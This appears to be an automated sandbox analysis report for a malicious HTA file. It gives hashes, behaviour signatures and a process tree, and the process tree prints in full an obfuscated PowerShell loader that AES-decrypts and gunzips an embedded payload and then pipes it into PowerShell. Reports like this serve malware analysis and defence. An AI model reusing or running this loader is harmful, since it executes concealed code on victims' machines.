Analysis

  • max time kernel
    122s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    10-01-2024 21:28

General

  • Target

    163.5.169.28/SCAN-atoletter5.hta

  • Size

    1.1MB

  • MD5

    415d6911c9a6e92b5d3f050668592357

  • SHA1

    3f5ddfb1475a25201e443c61e31382100e8ddbae

  • SHA256

    87b6bcaa19c9631310bb28100e1ed2c9f2b982fa5aaef48186da150d8d1c4ac3

  • SHA512

    6b322e26c4724efa648713c665d6eddc4f2191d9f3a7764076ae8fc8d5f13fd2301238e7aade65b49db71b0ecadd9333af42cfa7e98ae54b554a99eafc45a055

  • SSDEEP

    1536:zA8mj3XPCeaTTQT7L/1rTrZwsvCPA68WStimr/l1vcmafSIm+lIWFiWCK4vLwwlY:zA8mrfFITQTH/1rTrZ/CPArtQ

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\SCAN-atoletter5.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $yZFZU = 'AAAAAAAAAAAAAAAAAAAAABE/loWPunGVG3vSzIF+4gYYuSdi25LjA3R2sRH3ANApHSXuf8bMyC29pivChWpQUF5jwS5PApifdJjbv9vkn9DXSM/2JUYmdCYx5xVByfj6pJkMegF8zwFSo8ZK3if0l/4GDPyqshuCBy2VboNRKWl2p1X2wR5J/tGkqskOVoRV3QhNnczAnEf7CRFM1Is/fdf8XSHRubMBIegNiKhoMT1yK8XvCRkWspIFFLru1FAD1Tg8XS8hfxzJUo+IMPHy+J5oTh+lTZwOZakD7TqP4Xzzik8o63NllXciiYBuevivvXZZr+HcVIgajF1z3oX4UsK+7MGliiTTvOJi1VOFAs78fIyHSsOZILhUXxYy7eZCv6zcnay7/rblIpr37qEjWFrFTxJrDCWp9YtfLzZc7b92SprQ5byOTP7PWUhcfuxubcAZXSaei2P6+m8vsNlMODSdhRkDYjzzdvO4sxrk0K6z/maPnACOkYyHI31Y8T1dYS7bXlq67DvZCqMUKg0rsj57gecSAFYjJEjQWAKcsBsRFffl9H53XWNqeXBuKXZxxa0ynQYXAcFtg9xVpjNBjS2+dkWCgPzYxTbP2CyH+Rq++bYuh6VceUfqx+txd5dRFF66O86UOmD+UADlA493qnFc7E8MNauW7Xe2rE83WcmgDH2dlqTL08iguTVfV5/fdb2BOrX7G2jBgqdD5nYvk3+8CVRlLEshXPMD8nMvXD+kdwOoH2QrJshtBLc71bgjc9yTWJFCQU0kVOUCuFP6VmmNHo2lHZ5qqsXgvDfKKalBncPVo5+5vvLnNCMTeOItEFo/OuvVdc7dryTs3ZI5GPGkyiys6MpgGWIVfP9LPNm3mr6ZHiFETvBOcE0bJsJmPvPeL8rQGUGdZdZ1hbrIzo/8rBWelUO2l4N6Fvh2sSVcyxQeAGRdUNs0c7I+WzywCuWFVtVQyKA3uyPZP9DpQiy2D598sKkcFbMNZQ7wMpZKNLYqysKmEr4OwnHBYs4WhQCGPFPt2RkbwPLeqi25Qw==';$UmUBU = 'THVtZ1BydlRUVHNScG5hU0plckh1cmtOUHlBclZZblo=';$PaMSUA = New-Object 'System.Security.Cryptography.AesManaged';$PaMSUA.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PaMSUA.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PaMSUA.BlockSize = 128;$PaMSUA.KeySize = 256;$PaMSUA.Key = [System.Convert]::FromBase64String($UmUBU);$UiOuV = [System.Convert]::FromBase64String($yZFZU);$GvFGJiWe = $UiOuV[0..15];$PaMSUA.IV = $GvFGJiWe;$JMerDVEst = $PaMSUA.CreateDecryptor();$LmLcRliha = $JMerDVEst.TransformFinalBlock($UiOuV, 16, $UiOuV.Length - 16);$PaMSUA.Dispose();$nJoMQCa = New-Object System.IO.MemoryStream( , $LmLcRliha );$QIpvRfP = New-Object System.IO.MemoryStream;$sWecTZomO = New-Object System.IO.Compression.GzipStream $nJoMQCa, ([IO.Compression.CompressionMode]::Decompress);$sWecTZomO.CopyTo( $QIpvRfP );$sWecTZomO.Close();$nJoMQCa.Close();[byte[]] $XhBgIX = $QIpvRfP.ToArray();$oKWZi = [System.Text.Encoding]::UTF8.GetString($XhBgIX);$oKWZi | powershell - }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2684
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $yZFZU = 'AAAAAAAAAAAAAAAAAAAAABE/loWPunGVG3vSzIF+4gYYuSdi25LjA3R2sRH3ANApHSXuf8bMyC29pivChWpQUF5jwS5PApifdJjbv9vkn9DXSM/2JUYmdCYx5xVByfj6pJkMegF8zwFSo8ZK3if0l/4GDPyqshuCBy2VboNRKWl2p1X2wR5J/tGkqskOVoRV3QhNnczAnEf7CRFM1Is/fdf8XSHRubMBIegNiKhoMT1yK8XvCRkWspIFFLru1FAD1Tg8XS8hfxzJUo+IMPHy+J5oTh+lTZwOZakD7TqP4Xzzik8o63NllXciiYBuevivvXZZr+HcVIgajF1z3oX4UsK+7MGliiTTvOJi1VOFAs78fIyHSsOZILhUXxYy7eZCv6zcnay7/rblIpr37qEjWFrFTxJrDCWp9YtfLzZc7b92SprQ5byOTP7PWUhcfuxubcAZXSaei2P6+m8vsNlMODSdhRkDYjzzdvO4sxrk0K6z/maPnACOkYyHI31Y8T1dYS7bXlq67DvZCqMUKg0rsj57gecSAFYjJEjQWAKcsBsRFffl9H53XWNqeXBuKXZxxa0ynQYXAcFtg9xVpjNBjS2+dkWCgPzYxTbP2CyH+Rq++bYuh6VceUfqx+txd5dRFF66O86UOmD+UADlA493qnFc7E8MNauW7Xe2rE83WcmgDH2dlqTL08iguTVfV5/fdb2BOrX7G2jBgqdD5nYvk3+8CVRlLEshXPMD8nMvXD+kdwOoH2QrJshtBLc71bgjc9yTWJFCQU0kVOUCuFP6VmmNHo2lHZ5qqsXgvDfKKalBncPVo5+5vvLnNCMTeOItEFo/OuvVdc7dryTs3ZI5GPGkyiys6MpgGWIVfP9LPNm3mr6ZHiFETvBOcE0bJsJmPvPeL8rQGUGdZdZ1hbrIzo/8rBWelUO2l4N6Fvh2sSVcyxQeAGRdUNs0c7I+WzywCuWFVtVQyKA3uyPZP9DpQiy2D598sKkcFbMNZQ7wMpZKNLYqysKmEr4OwnHBYs4WhQCGPFPt2RkbwPLeqi25Qw==';$UmUBU = 'THVtZ1BydlRUVHNScG5hU0plckh1cmtOUHlBclZZblo=';$PaMSUA = New-Object 'System.Security.Cryptography.AesManaged';$PaMSUA.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PaMSUA.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PaMSUA.BlockSize = 128;$PaMSUA.KeySize = 256;$PaMSUA.Key = [System.Convert]::FromBase64String($UmUBU);$UiOuV = [System.Convert]::FromBase64String($yZFZU);$GvFGJiWe = $UiOuV[0..15];$PaMSUA.IV = $GvFGJiWe;$JMerDVEst = $PaMSUA.CreateDecryptor();$LmLcRliha = $JMerDVEst.TransformFinalBlock($UiOuV, 16, $UiOuV.Length - 16);$PaMSUA.Dispose();$nJoMQCa = New-Object System.IO.MemoryStream( , $LmLcRliha );$QIpvRfP = New-Object System.IO.MemoryStream;$sWecTZomO = New-Object System.IO.Compression.GzipStream $nJoMQCa, ([IO.Compression.CompressionMode]::Decompress);$sWecTZomO.CopyTo( $QIpvRfP );$sWecTZomO.Close();$nJoMQCa.Close();[byte[]] $XhBgIX = $QIpvRfP.ToArray();$oKWZi = [System.Text.Encoding]::UTF8.GetString($XhBgIX);$oKWZi | powershell -
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1988
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2620
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $yZFZU = 'AAAAAAAAAAAAAAAAAAAAABE/loWPunGVG3vSzIF+4gYYuSdi25LjA3R2sRH3ANApHSXuf8bMyC29pivChWpQUF5jwS5PApifdJjbv9vkn9DXSM/2JUYmdCYx5xVByfj6pJkMegF8zwFSo8ZK3if0l/4GDPyqshuCBy2VboNRKWl2p1X2wR5J/tGkqskOVoRV3QhNnczAnEf7CRFM1Is/fdf8XSHRubMBIegNiKhoMT1yK8XvCRkWspIFFLru1FAD1Tg8XS8hfxzJUo+IMPHy+J5oTh+lTZwOZakD7TqP4Xzzik8o63NllXciiYBuevivvXZZr+HcVIgajF1z3oX4UsK+7MGliiTTvOJi1VOFAs78fIyHSsOZILhUXxYy7eZCv6zcnay7/rblIpr37qEjWFrFTxJrDCWp9YtfLzZc7b92SprQ5byOTP7PWUhcfuxubcAZXSaei2P6+m8vsNlMODSdhRkDYjzzdvO4sxrk0K6z/maPnACOkYyHI31Y8T1dYS7bXlq67DvZCqMUKg0rsj57gecSAFYjJEjQWAKcsBsRFffl9H53XWNqeXBuKXZxxa0ynQYXAcFtg9xVpjNBjS2+dkWCgPzYxTbP2CyH+Rq++bYuh6VceUfqx+txd5dRFF66O86UOmD+UADlA493qnFc7E8MNauW7Xe2rE83WcmgDH2dlqTL08iguTVfV5/fdb2BOrX7G2jBgqdD5nYvk3+8CVRlLEshXPMD8nMvXD+kdwOoH2QrJshtBLc71bgjc9yTWJFCQU0kVOUCuFP6VmmNHo2lHZ5qqsXgvDfKKalBncPVo5+5vvLnNCMTeOItEFo/OuvVdc7dryTs3ZI5GPGkyiys6MpgGWIVfP9LPNm3mr6ZHiFETvBOcE0bJsJmPvPeL8rQGUGdZdZ1hbrIzo/8rBWelUO2l4N6Fvh2sSVcyxQeAGRdUNs0c7I+WzywCuWFVtVQyKA3uyPZP9DpQiy2D598sKkcFbMNZQ7wMpZKNLYqysKmEr4OwnHBYs4WhQCGPFPt2RkbwPLeqi25Qw==';$UmUBU = 'THVtZ1BydlRUVHNScG5hU0plckh1cmtOUHlBclZZblo=';$PaMSUA = New-Object 'System.Security.Cryptography.AesManaged';$PaMSUA.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PaMSUA.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PaMSUA.BlockSize = 128;$PaMSUA.KeySize = 256;$PaMSUA.Key = [System.Convert]::FromBase64String($UmUBU);$UiOuV = [System.Convert]::FromBase64String($yZFZU);$GvFGJiWe = $UiOuV[0..15];$PaMSUA.IV = $GvFGJiWe;$JMerDVEst = $PaMSUA.CreateDecryptor();$LmLcRliha = $JMerDVEst.TransformFinalBlock($UiOuV, 16, $UiOuV.Length - 16);$PaMSUA.Dispose();$nJoMQCa = New-Object System.IO.MemoryStream( , $LmLcRliha );$QIpvRfP = New-Object System.IO.MemoryStream;$sWecTZomO = New-Object System.IO.Compression.GzipStream $nJoMQCa, ([IO.Compression.CompressionMode]::Decompress);$sWecTZomO.CopyTo( $QIpvRfP );$sWecTZomO.Close();$nJoMQCa.Close();[byte[]] $XhBgIX = $QIpvRfP.ToArray();$oKWZi = [System.Text.Encoding]::UTF8.GetString($XhBgIX);$oKWZi
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2520

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    0ada2bbab3b13001eb7162a20fdb9c56

    SHA1

    3b9df7378db24b32f00af60119ad36bbfc96d687

    SHA256

    97ae2bee0c424cdd68f6ff29b855b5e443e82700ea72b0f58fca32ce772ab9e9

    SHA512

    8ead85bdc345b182b9929d9b2302a8f7b183b26d6d493bbe794f4666714cb3875ffaa655cf07718b518ce7a3b41bdecdfad40851ac588a039aef29d326a9b020

  • memory/2520-30-0x0000000002730000-0x0000000002770000-memory.dmp

    Filesize

    256KB

  • memory/2520-38-0x0000000072170000-0x000000007271B000-memory.dmp

    Filesize

    5.7MB

  • memory/2520-20-0x0000000002730000-0x0000000002770000-memory.dmp

    Filesize

    256KB

  • memory/2520-21-0x0000000072170000-0x000000007271B000-memory.dmp

    Filesize

    5.7MB

  • memory/2520-19-0x0000000072170000-0x000000007271B000-memory.dmp

    Filesize

    5.7MB

  • memory/2520-22-0x0000000002730000-0x0000000002770000-memory.dmp

    Filesize

    256KB

  • memory/2620-28-0x0000000002670000-0x00000000026B0000-memory.dmp

    Filesize

    256KB

  • memory/2620-39-0x0000000072170000-0x000000007271B000-memory.dmp

    Filesize

    5.7MB

  • memory/2620-33-0x0000000002670000-0x00000000026B0000-memory.dmp

    Filesize

    256KB

  • memory/2620-35-0x0000000072170000-0x000000007271B000-memory.dmp

    Filesize

    5.7MB

  • memory/2620-23-0x0000000002670000-0x00000000026B0000-memory.dmp

    Filesize

    256KB

  • memory/2620-25-0x0000000072170000-0x000000007271B000-memory.dmp

    Filesize

    5.7MB

  • memory/2684-3-0x0000000072720000-0x0000000072CCB000-memory.dmp

    Filesize

    5.7MB

  • memory/2684-2-0x0000000072720000-0x0000000072CCB000-memory.dmp

    Filesize

    5.7MB

  • memory/2684-5-0x00000000027D0000-0x0000000002810000-memory.dmp

    Filesize

    256KB

  • memory/2684-4-0x00000000027D0000-0x0000000002810000-memory.dmp

    Filesize

    256KB

  • memory/2684-7-0x0000000072720000-0x0000000072CCB000-memory.dmp

    Filesize

    5.7MB

  • memory/2684-6-0x00000000027D0000-0x0000000002810000-memory.dmp

    Filesize

    256KB